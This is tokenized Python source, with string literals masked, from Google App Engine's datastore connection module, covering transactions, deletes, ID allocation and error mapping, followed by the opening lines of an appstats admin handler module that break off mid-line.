<EOL> def __put_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> entities_from_request , extra_hook = rpc . user_data <EOL> if ( _CLOUD_DATASTORE_ENABLED <EOL> and isinstance ( rpc . response , googledatastore . 
CommitResponse ) ) : <EOL> keys = [ ] <EOL> i = <NUM_LIT:0> <EOL> for entity in entities_from_request : <EOL> if datastore_pbs . is_complete_v1_key ( entity . key ) : <EOL> keys . append ( entity . key ) <EOL> else : <EOL> keys . append ( rpc . response . mutation_results [ i ] . key ) <EOL> i += <NUM_LIT:1> <EOL> keys = [ self . __adapter . pb_v1_to_key ( key ) for key in keys ] <EOL> else : <EOL> keys = [ self . __adapter . pb_to_key ( key ) for key in rpc . response . key_list ( ) ] <EOL> if extra_hook is not None : <EOL> keys = extra_hook ( keys ) <EOL> return keys <EOL> def delete ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> return self . async_delete ( None , keys ) . get_result ( ) <EOL> def async_delete ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def make_delete_call ( base_req , pbs , user_data = None ) : <EOL> req = copy . deepcopy ( base_req ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> for pb in pbs : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . delete . CopyFrom ( pb ) <EOL> method = '<STR_LIT>' <EOL> resp = googledatastore . CommitResponse ( ) <EOL> else : <EOL> req . key_list ( ) . extend ( pbs ) <EOL> method = '<STR_LIT>' <EOL> resp = datastore_pb . DeleteResponse ( ) <EOL> return self . _make_rpc_call ( config , method , req , resp , <EOL> get_result_hook = self . __delete_hook , <EOL> user_data = user_data , <EOL> service_name = self . _api_version ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> base_req = googledatastore . CommitRequest ( ) <EOL> base_req . mode = googledatastore . CommitRequest . NON_TRANSACTIONAL <EOL> key_to_pb = self . __adapter . key_to_pb_v1 <EOL> else : <EOL> base_req = datastore_pb . DeleteRequest ( ) <EOL> key_to_pb = self . __adapter . key_to_pb <EOL> self . _set_request_transaction ( base_req ) <EOL> if Configuration . force_writes ( config , self . __config ) : <EOL> self . 
__force ( base_req ) <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) or len ( keys ) <= <NUM_LIT:1> : <EOL> pbs = [ key_to_pb ( key ) for key in keys ] <EOL> return make_delete_call ( base_req , pbs , extra_hook ) <EOL> max_count = ( Configuration . max_delete_keys ( config , self . __config ) or <EOL> self . MAX_DELETE_KEYS ) <EOL> if ( ( self . _api_version == _CLOUD_DATASTORE_V1 and <EOL> not base_req . transaction ) or <EOL> not base_req . has_transaction ( ) ) : <EOL> max_egs_per_rpc = self . __get_max_entity_groups_per_rpc ( config ) <EOL> else : <EOL> max_egs_per_rpc = None <EOL> indexed_keys_by_entity_group = self . _map_and_group ( <EOL> keys , key_to_pb , self . _extract_entity_group ) <EOL> pbsgen = self . _generate_pb_lists ( indexed_keys_by_entity_group , <EOL> base_req . ByteSize ( ) , max_count , <EOL> max_egs_per_rpc , config ) <EOL> rpcs = [ ] <EOL> for pbs , _ in pbsgen : <EOL> rpcs . append ( make_delete_call ( base_req , pbs ) ) <EOL> return MultiRpc ( rpcs , extra_hook ) <EOL> def __delete_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> if rpc . user_data is not None : <EOL> rpc . user_data ( None ) <EOL> def begin_transaction ( self , app ) : <EOL> """<STR_LIT>""" <EOL> return self . async_begin_transaction ( None , app ) . get_result ( ) <EOL> def async_begin_transaction ( self , config , app ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( app , basestring ) or not app : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( app , ) ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> req = googledatastore . BeginTransactionRequest ( ) <EOL> resp = googledatastore . BeginTransactionResponse ( ) <EOL> else : <EOL> req = datastore_pb . BeginTransactionRequest ( ) <EOL> req . set_app ( app ) <EOL> if ( TransactionOptions . xg ( config , self . __config ) ) : <EOL> req . set_allow_multiple_eg ( True ) <EOL> resp = datastore_pb . Transaction ( ) <EOL> return self . 
_make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __begin_transaction_hook , <EOL> service_name = self . _api_version ) <EOL> def __begin_transaction_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> return rpc . response . transaction <EOL> else : <EOL> return rpc . response <EOL> class Connection ( BaseConnection ) : <EOL> """<STR_LIT>""" <EOL> @ _positional ( <NUM_LIT:1> ) <EOL> def __init__ ( self , adapter = None , config = None , _api_version = _DATASTORE_V3 ) : <EOL> """<STR_LIT>""" <EOL> super ( Connection , self ) . __init__ ( adapter = adapter , config = config , <EOL> _api_version = _api_version ) <EOL> self . __adapter = self . adapter <EOL> self . __config = self . config <EOL> def new_transaction ( self , config = None ) : <EOL> """<STR_LIT>""" <EOL> config = self . __config . merge ( config ) <EOL> return TransactionalConnection ( adapter = self . __adapter , config = config , <EOL> _api_version = self . _api_version ) <EOL> def allocate_ids ( self , key , size = None , max = None ) : <EOL> """<STR_LIT>""" <EOL> return self . async_allocate_ids ( None , key , size , max ) . get_result ( ) <EOL> def async_allocate_ids ( self , config , key , size = None , max = None , <EOL> extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> if size is not None : <EOL> if max is not None : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> if not isinstance ( size , ( int , long ) ) : <EOL> raise datastore_errors . BadArgumentError ( '<STR_LIT>' % ( size , ) ) <EOL> if size > _MAX_ID_BATCH_SIZE : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' <EOL> % ( _MAX_ID_BATCH_SIZE , size ) ) <EOL> if size <= <NUM_LIT:0> : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % size ) <EOL> if max is not None : <EOL> if not isinstance ( max , ( int , long ) ) : <EOL> raise datastore_errors . 
BadArgumentError ( '<STR_LIT>' % ( max , ) ) <EOL> if max < <NUM_LIT:0> : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % <EOL> size ) <EOL> req = datastore_pb . AllocateIdsRequest ( ) <EOL> req . mutable_model_key ( ) . CopyFrom ( self . __adapter . key_to_pb ( key ) ) <EOL> if size is not None : <EOL> req . set_size ( size ) <EOL> if max is not None : <EOL> req . set_max ( max ) <EOL> resp = datastore_pb . AllocateIdsResponse ( ) <EOL> rpc = self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __allocate_ids_hook , <EOL> user_data = extra_hook , <EOL> service_name = _DATASTORE_V3 ) <EOL> return rpc <EOL> def __allocate_ids_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> pair = rpc . response . start ( ) , rpc . response . end ( ) <EOL> if rpc . user_data is not None : <EOL> pair = rpc . user_data ( pair ) <EOL> return pair <EOL> def _reserve_keys ( self , keys ) : <EOL> """<STR_LIT>""" <EOL> self . _async_reserve_keys ( None , keys ) . get_result ( ) <EOL> def _async_reserve_keys ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> def to_id_key ( key ) : <EOL> if key . path ( ) . element_size ( ) == <NUM_LIT:1> : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return self . _extract_entity_group ( key ) <EOL> keys_by_idkey = self . _map_and_group ( keys , self . __adapter . key_to_pb , <EOL> to_id_key ) <EOL> max_count = ( Configuration . max_allocate_ids_keys ( config , self . __config ) or <EOL> self . MAX_ALLOCATE_IDS_KEYS ) <EOL> rpcs = [ ] <EOL> pbsgen = self . _generate_pb_lists ( keys_by_idkey , <NUM_LIT:0> , max_count , None , config ) <EOL> for pbs , _ in pbsgen : <EOL> req = datastore_v4_pb . AllocateIdsRequest ( ) <EOL> for key in pbs : <EOL> datastore_pbs . get_entity_converter ( ) . v3_to_v4_key ( key , <EOL> req . add_reserve ( ) ) <EOL> resp = datastore_v4_pb . AllocateIdsResponse ( ) <EOL> rpcs . append ( self . 
_make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __reserve_keys_hook , <EOL> user_data = extra_hook , <EOL> service_name = _DATASTORE_V4 ) ) <EOL> return MultiRpc ( rpcs ) <EOL> def __reserve_keys_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> if rpc . user_data is not None : <EOL> return rpc . user_data ( rpc . response ) <EOL> class TransactionOptions ( Configuration ) : <EOL> """<STR_LIT>""" <EOL> NESTED = <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> MANDATORY = <NUM_LIT:2> <EOL> """<STR_LIT>""" <EOL> ALLOWED = <NUM_LIT:3> <EOL> """<STR_LIT>""" <EOL> INDEPENDENT = <NUM_LIT:4> <EOL> """<STR_LIT>""" <EOL> _PROPAGATION = frozenset ( ( NESTED , MANDATORY , ALLOWED , INDEPENDENT ) ) <EOL> @ ConfigOption <EOL> def propagation ( value ) : <EOL> """<STR_LIT>""" <EOL> if value not in TransactionOptions . _PROPAGATION : <EOL> raise datastore_errors . BadArgumentError ( '<STR_LIT>' % <EOL> ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def xg ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , bool ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def retries ( value ) : <EOL> """<STR_LIT>""" <EOL> datastore_types . ValidateInteger ( value , <EOL> '<STR_LIT>' , <EOL> datastore_errors . BadArgumentError , <EOL> zero_ok = True ) <EOL> return value <EOL> @ ConfigOption <EOL> def app ( value ) : <EOL> """<STR_LIT>""" <EOL> datastore_types . ValidateString ( value , <EOL> '<STR_LIT>' , <EOL> datastore_errors . BadArgumentError ) <EOL> return value <EOL> class TransactionalConnection ( BaseConnection ) : <EOL> """<STR_LIT>""" <EOL> @ _positional ( <NUM_LIT:1> ) <EOL> def __init__ ( self , <EOL> adapter = None , config = None , transaction = None , entity_group = None , <EOL> _api_version = _DATASTORE_V3 ) : <EOL> """<STR_LIT>""" <EOL> super ( TransactionalConnection , self ) . 
__init__ ( adapter = adapter , <EOL> config = config , <EOL> _api_version = _api_version ) <EOL> self . __adapter = self . adapter <EOL> self . __config = self . config <EOL> if transaction is None : <EOL> app = TransactionOptions . app ( self . config ) <EOL> app = datastore_types . ResolveAppId ( TransactionOptions . app ( self . config ) ) <EOL> self . __transaction_rpc = self . async_begin_transaction ( None , app ) <EOL> else : <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> txn_class = str <EOL> else : <EOL> txn_class = datastore_pb . Transaction <EOL> if not isinstance ( transaction , txn_class ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % transaction ) <EOL> self . __transaction = transaction <EOL> self . __transaction_rpc = None <EOL> self . __finished = False <EOL> self . __pending_v1_upserts = { } <EOL> self . __pending_v1_deletes = { } <EOL> @ property <EOL> def finished ( self ) : <EOL> return self . __finished <EOL> @ property <EOL> def transaction ( self ) : <EOL> if self . __transaction_rpc is not None : <EOL> self . __transaction = self . __transaction_rpc . get_result ( ) <EOL> self . __transaction_rpc = None <EOL> return self . __transaction <EOL> def _set_request_transaction ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if self . __finished : <EOL> raise datastore_errors . BadRequestError ( <EOL> '<STR_LIT>' ) <EOL> transaction = self . transaction <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> if isinstance ( request , ( googledatastore . CommitRequest , <EOL> googledatastore . RollbackRequest ) ) : <EOL> request . transaction = transaction <EOL> elif isinstance ( request , ( googledatastore . LookupRequest , <EOL> googledatastore . RunQueryRequest ) ) : <EOL> request . read_options . transaction = transaction <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> type ( request ) ) <EOL> request . read_options . transaction = transaction <EOL> else : <EOL> request . 
mutable_transaction ( ) . CopyFrom ( transaction ) <EOL> return transaction <EOL> def _end_transaction ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __finished : <EOL> raise datastore_errors . BadRequestError ( <EOL> '<STR_LIT>' ) <EOL> self . wait_for_all_pending_rpcs ( ) <EOL> assert not self . get_pending_rpcs ( ) <EOL> transaction = self . transaction <EOL> self . __finished = True <EOL> self . __transaction = None <EOL> return transaction <EOL> def async_put ( self , config , entities , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _api_version != _CLOUD_DATASTORE_V1 : <EOL> return super ( TransactionalConnection , self ) . async_put ( <EOL> config , entities , extra_hook ) <EOL> v1_entities = [ self . adapter . entity_to_pb_v1 ( entity ) <EOL> for entity in entities ] <EOL> v1_req = googledatastore . AllocateIdsRequest ( ) <EOL> for v1_entity in v1_entities : <EOL> if not datastore_pbs . is_complete_v1_key ( v1_entity . key ) : <EOL> v1_req . keys . add ( ) . CopyFrom ( v1_entity . key ) <EOL> user_data = v1_entities , extra_hook <EOL> service_name = _CLOUD_DATASTORE_V1 <EOL> if not v1_req . keys : <EOL> service_name = _NOOP_SERVICE <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , v1_req , <EOL> googledatastore . AllocateIdsResponse ( ) , <EOL> get_result_hook = self . __v1_put_allocate_ids_hook , <EOL> user_data = user_data , <EOL> service_name = service_name ) <EOL> def __v1_put_allocate_ids_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> v1_resp = rpc . response <EOL> return self . __v1_build_put_result ( list ( v1_resp . keys ) , <EOL> rpc . user_data ) <EOL> def __v1_build_put_result ( self , v1_allocated_keys , user_data ) : <EOL> """<STR_LIT>""" <EOL> v1_entities , extra_hook = user_data <EOL> keys = [ ] <EOL> idx = <NUM_LIT:0> <EOL> for v1_entity in v1_entities : <EOL> v1_entity = copy . deepcopy ( v1_entity ) <EOL> if not datastore_pbs . is_complete_v1_key ( v1_entity . 
key ) : <EOL> v1_entity . key . CopyFrom ( v1_allocated_keys [ idx ] ) <EOL> idx += <NUM_LIT:1> <EOL> hashable_key = datastore_types . ReferenceToKeyValue ( v1_entity . key ) <EOL> self . __pending_v1_deletes . pop ( hashable_key , None ) <EOL> self . __pending_v1_upserts [ hashable_key ] = v1_entity <EOL> keys . append ( self . adapter . pb_v1_to_key ( copy . deepcopy ( v1_entity . key ) ) ) <EOL> if extra_hook : <EOL> keys = extra_hook ( keys ) <EOL> return keys <EOL> def async_delete ( self , config , keys , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _api_version != _CLOUD_DATASTORE_V1 : <EOL> return super ( TransactionalConnection , self ) . async_delete ( config , <EOL> keys , <EOL> extra_hook ) <EOL> v1_keys = [ self . __adapter . key_to_pb_v1 ( key ) for key in keys ] <EOL> for key in v1_keys : <EOL> hashable_key = datastore_types . ReferenceToKeyValue ( key ) <EOL> self . __pending_v1_upserts . pop ( hashable_key , None ) <EOL> self . __pending_v1_deletes [ hashable_key ] = key <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , None , <EOL> googledatastore . CommitResponse ( ) , <EOL> get_result_hook = self . __v1_delete_hook , <EOL> user_data = extra_hook , <EOL> service_name = _NOOP_SERVICE ) <EOL> def __v1_delete_hook ( self , rpc ) : <EOL> extra_hook = rpc . user_data <EOL> if extra_hook : <EOL> extra_hook ( None ) <EOL> def commit ( self ) : <EOL> """<STR_LIT>""" <EOL> rpc = self . _create_rpc ( service_name = self . _api_version ) <EOL> rpc = self . async_commit ( rpc ) <EOL> if rpc is None : <EOL> return True <EOL> return rpc . get_result ( ) <EOL> def async_commit ( self , config ) : <EOL> """<STR_LIT>""" <EOL> transaction = self . _end_transaction ( ) <EOL> if transaction is None : <EOL> return None <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> req = googledatastore . CommitRequest ( ) <EOL> req . transaction = transaction <EOL> if Configuration . force_writes ( config , self . __config ) : <EOL> self . 
__force ( req ) <EOL> for entity in self . __pending_v1_upserts . itervalues ( ) : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . upsert . CopyFrom ( entity ) <EOL> for key in self . __pending_v1_deletes . itervalues ( ) : <EOL> mutation = req . mutations . add ( ) <EOL> mutation . delete . CopyFrom ( key ) <EOL> self . __pending_v1_upserts . clear ( ) <EOL> self . __pending_v1_deletes . clear ( ) <EOL> resp = googledatastore . CommitResponse ( ) <EOL> else : <EOL> req = transaction <EOL> resp = datastore_pb . CommitResponse ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __commit_hook , <EOL> service_name = self . _api_version ) <EOL> def __commit_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> rpc . check_success ( ) <EOL> except apiproxy_errors . ApplicationError , err : <EOL> if err . application_error == datastore_pb . Error . CONCURRENT_TRANSACTION : <EOL> return False <EOL> else : <EOL> raise _ToDatastoreError ( err ) <EOL> else : <EOL> return True <EOL> def rollback ( self ) : <EOL> """<STR_LIT>""" <EOL> rpc = self . async_rollback ( None ) <EOL> if rpc is None : <EOL> return None <EOL> return rpc . get_result ( ) <EOL> def async_rollback ( self , config ) : <EOL> """<STR_LIT>""" <EOL> transaction = self . _end_transaction ( ) <EOL> if transaction is None : <EOL> return None <EOL> if self . _api_version == _CLOUD_DATASTORE_V1 : <EOL> req = googledatastore . RollbackRequest ( ) <EOL> req . transaction = transaction <EOL> resp = googledatastore . RollbackResponse ( ) <EOL> else : <EOL> req = transaction <EOL> resp = api_base_pb . VoidProto ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __rollback_hook , <EOL> service_name = self . _api_version ) <EOL> def __rollback_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . 
check_rpc_success ( rpc ) <EOL> _DATASTORE_APP_ID_ENV = '<STR_LIT>' <EOL> _DATASTORE_PROJECT_ID_ENV = '<STR_LIT>' <EOL> _DATASTORE_ADDITIONAL_APP_IDS_ENV = '<STR_LIT>' <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV = '<STR_LIT>' <EOL> def _CreateDefaultConnection ( connection_fn , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> datastore_app_id = os . environ . get ( _DATASTORE_APP_ID_ENV , None ) <EOL> datastore_project_id = os . environ . get ( _DATASTORE_PROJECT_ID_ENV , None ) <EOL> if datastore_app_id or datastore_project_id : <EOL> app_id_override = bool ( os . environ . get ( <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV , False ) ) <EOL> if not datastore_app_id and not app_id_override : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( datastore_project_id , <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV , <EOL> _DATASTORE_APP_ID_ENV ) ) <EOL> elif datastore_app_id : <EOL> if app_id_override : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( datastore_app_id , <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV , <EOL> _DATASTORE_APP_ID_ENV , <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV ) ) <EOL> elif datastore_project_id : <EOL> id_resolver = datastore_pbs . IdResolver ( [ datastore_app_id ] ) <EOL> if ( datastore_project_id != <EOL> id_resolver . resolve_project_id ( datastore_app_id ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( datastore_app_id , datastore_project_id ) ) <EOL> datastore_app_id = datastore_app_id or datastore_project_id <EOL> additional_app_str = os . environ . get ( _DATASTORE_ADDITIONAL_APP_IDS_ENV , '<STR_LIT>' ) <EOL> additional_apps = ( app . strip ( ) for app in additional_app_str . 
split ( '<STR_LIT:U+002C>' ) ) <EOL> return _CreateCloudDatastoreConnection ( connection_fn , <EOL> datastore_app_id , <EOL> additional_apps , <EOL> kwargs ) <EOL> return connection_fn ( ** kwargs ) <EOL> def _CreateCloudDatastoreConnection ( connection_fn , <EOL> app_id , <EOL> external_app_ids , <EOL> kwargs ) : <EOL> """<STR_LIT>""" <EOL> from google . appengine . datastore import cloud_datastore_v1_remote_stub <EOL> if not datastore_pbs . _CLOUD_DATASTORE_ENABLED : <EOL> raise datastore_errors . BadArgumentError ( <EOL> datastore_pbs . MISSING_CLOUD_DATASTORE_MESSAGE ) <EOL> current_app_id = os . environ . get ( '<STR_LIT>' , None ) <EOL> if current_app_id and current_app_id != app_id : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( app_id , current_app_id ) ) <EOL> os . environ [ '<STR_LIT>' ] = app_id <EOL> id_resolver = datastore_pbs . IdResolver ( ( app_id , ) + tuple ( external_app_ids ) ) <EOL> project_id = id_resolver . resolve_project_id ( app_id ) <EOL> endpoint = googledatastore . helper . get_project_endpoint_from_env ( project_id ) <EOL> datastore = googledatastore . Datastore ( <EOL> project_endpoint = endpoint , <EOL> credentials = googledatastore . helper . get_credentials_from_env ( ) ) <EOL> kwargs [ '<STR_LIT>' ] = _CLOUD_DATASTORE_V1 <EOL> kwargs [ '<STR_LIT>' ] = id_resolver <EOL> conn = connection_fn ( ** kwargs ) <EOL> try : <EOL> stub = cloud_datastore_v1_remote_stub . CloudDatastoreV1RemoteStub ( datastore ) <EOL> apiproxy_stub_map . apiproxy . RegisterStub ( _CLOUD_DATASTORE_V1 , <EOL> stub ) <EOL> except : <EOL> pass <EOL> try : <EOL> apiproxy_stub_map . apiproxy . RegisterStub ( '<STR_LIT>' , _ThrowingStub ( ) ) <EOL> except : <EOL> pass <EOL> try : <EOL> apiproxy_stub_map . apiproxy . 
RegisterStub ( '<STR_LIT>' , _ThrowingStub ( ) ) <EOL> except : <EOL> pass <EOL> return conn <EOL> class _ThrowingStub ( object ) : <EOL> """<STR_LIT>""" <EOL> def MakeSyncCall ( self , service , call , request , response ) : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( service , call ) ) <EOL> def CreateRPC ( self ) : <EOL> return apiproxy_rpc . RPC ( stub = self ) <EOL> def _ToDatastoreError ( err ) : <EOL> """<STR_LIT>""" <EOL> return _DatastoreExceptionFromErrorCodeAndDetail ( err . application_error , <EOL> err . error_detail ) <EOL> _DATASTORE_EXCEPTION_CLASSES = { <EOL> datastore_pb . Error . BAD_REQUEST : datastore_errors . BadRequestError , <EOL> datastore_pb . Error . CONCURRENT_TRANSACTION : datastore_errors . TransactionFailedError , <EOL> datastore_pb . Error . INTERNAL_ERROR : datastore_errors . InternalError , <EOL> datastore_pb . Error . NEED_INDEX : datastore_errors . NeedIndexError , <EOL> datastore_pb . Error . TIMEOUT : datastore_errors . Timeout , <EOL> datastore_pb . Error . BIGTABLE_ERROR : datastore_errors . Timeout , <EOL> datastore_pb . Error . COMMITTED_BUT_STILL_APPLYING : datastore_errors . CommittedButStillApplying , <EOL> datastore_pb . Error . CAPABILITY_DISABLED : apiproxy_errors . CapabilityDisabledError , <EOL> } <EOL> _CLOUD_DATASTORE_EXCEPTION_CLASSES = { } <EOL> if _CLOUD_DATASTORE_ENABLED : <EOL> _CLOUD_DATASTORE_EXCEPTION_CLASSES = { <EOL> googledatastore . code_pb2 . INVALID_ARGUMENT : datastore_errors . BadRequestError , <EOL> googledatastore . code_pb2 . ABORTED : datastore_errors . TransactionFailedError , <EOL> googledatastore . code_pb2 . FAILED_PRECONDITION : <EOL> datastore_errors . NeedIndexError , <EOL> googledatastore . code_pb2 . DEADLINE_EXCEEDED : datastore_errors . Timeout , <EOL> googledatastore . code_pb2 . PERMISSION_DENIED : datastore_errors . BadRequestError , <EOL> googledatastore . code_pb2 . UNAVAILABLE : apiproxy_errors . RPCFailedError , <EOL> googledatastore . code_pb2 . 
RESOURCE_EXHAUSTED : apiproxy_errors . OverQuotaError , <EOL> googledatastore . code_pb2 . INTERNAL : <EOL> datastore_errors . InternalError , <EOL> } <EOL> def _DatastoreExceptionFromErrorCodeAndDetail ( error , detail ) : <EOL> """<STR_LIT>""" <EOL> exception_class = _DATASTORE_EXCEPTION_CLASSES . get ( error , <EOL> datastore_errors . Error ) <EOL> if detail is None : <EOL> return exception_class ( ) <EOL> else : <EOL> return exception_class ( detail ) <EOL> def _DatastoreExceptionFromCanonicalErrorCodeAndDetail ( error , detail ) : <EOL> """<STR_LIT>""" <EOL> exception_class = _CLOUD_DATASTORE_EXCEPTION_CLASSES . get ( <EOL> error , datastore_errors . InternalError ) <EOL> if detail is None : <EOL> return exception_class ( ) <EOL> else : <EOL> return exception_class ( detail ) </s>
<s> """<STR_LIT>""" <EOL> import cgi <EOL> import cStringIO <EOL> import email . Utils <EOL> import logging <EOL> import mimetypes <EOL> import os <EOL> import re <EOL> import sys <EOL> import time <EOL> import traceback <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import admin <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . appstats import datamodel_pb <EOL> from google . appengine . ext . appstats import recording <EOL> from google . appengine . ext . webapp import _template <EOL> from google . appengine . ext . webapp import util <EOL> DEBUG = recording . config . DEBUG <EOL> def _add_billed_ops_to_map ( billed_ops_map , billed_ops_list ) : <EOL> """<STR_LIT>""" <EOL> for billed_op in billed_ops_list : <EOL> if billed_op . op ( ) not in billed_ops_map : <EOL> update_me = datamodel_pb . BilledOpProto ( ) <EOL> update_me . set_op ( billed_op . op ( ) ) <EOL> update_me . set_num_ops ( <NUM_LIT:0> ) <EOL> billed_ops_map [ billed_op . op ( ) ] = update_me <EOL> update_me = billed_ops_map [ billed_op . op ( ) ] <EOL> update_me . set_num_ops ( update_me . num_ops ( ) + billed_op . num_ops ( ) ) <EOL> def _billed_ops_to_str ( billed_ops ) : <EOL> """<STR_LIT>""" <EOL> ops_as_strs = [ ] <EOL> for op in billed_ops : <EOL> op_name = datamodel_pb . BilledOpProto . BilledOp_Name ( op . op ( ) ) <EOL> ops_as_strs . append ( '<STR_LIT>' % ( op_name , op . num_ops ( ) ) ) <EOL> return '<STR_LIT:U+002CU+0020>' . join ( ops_as_strs ) <EOL> def _as_percentage_of ( cost_micropennies , total_cost_micropennies ) : <EOL> """<STR_LIT>""" <EOL> if total_cost_micropennies == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return round ( ( float ( cost_micropennies ) / float ( total_cost_micropennies ) ) <EOL> * <NUM_LIT:100> , <NUM_LIT:1> ) <EOL> def render ( tmplname , data ) : <EOL> """<STR_LIT>""" <EOL> here = os . path . dirname ( __file__ ) <EOL> tmpl = os . path . 
join ( here , '<STR_LIT>' , tmplname ) <EOL> data [ '<STR_LIT>' ] = os . environ <EOL> data [ '<STR_LIT>' ] = recording . config . SHELL_OK <EOL> data [ '<STR_LIT>' ] = os . getenv ( '<STR_LIT>' ) <EOL> try : <EOL> return _template . render ( tmpl , data ) <EOL> except Exception , err : <EOL> logging . exception ( '<STR_LIT>' , tmpl ) <EOL> return '<STR_LIT>' % ( tmplname , err ) <EOL> class AllStatsInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , calls , cost , billed_ops ) : <EOL> self . calls = calls <EOL> self . cost = cost <EOL> self . billed_ops = billed_ops <EOL> class PathStatsInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cost , billed_ops , num_requests , most_recent_requests ) : <EOL> self . cost = cost <EOL> self . billed_ops = billed_ops <EOL> self . num_requests = num_requests <EOL> self . most_recent_requests = most_recent_requests <EOL> class PivotInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , calls , cost , billed_ops , cost_pct ) : <EOL> self . name = name <EOL> self . calls = calls <EOL> self . cost = cost <EOL> self . billed_ops = billed_ops <EOL> self . cost_pct = cost_pct <EOL> def to_list ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self . name , self . calls , self . cost , self . billed_ops , self . cost_pct ] <EOL> @ classmethod <EOL> def from_list ( cls , values ) : <EOL> return cls ( values [ <NUM_LIT:0> ] , values [ <NUM_LIT:1> ] , values [ <NUM_LIT:2> ] , values [ <NUM_LIT:3> ] , values [ <NUM_LIT:4> ] ) <EOL> class SummaryHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> if not self . request . path . endswith ( '<STR_LIT:/>' ) : <EOL> self . redirect ( self . request . path + '<STR_LIT:/>' ) <EOL> return <EOL> summaries = recording . load_summary_protos ( ) <EOL> data = self . _get_summary_data ( summaries ) <EOL> self . response . out . 
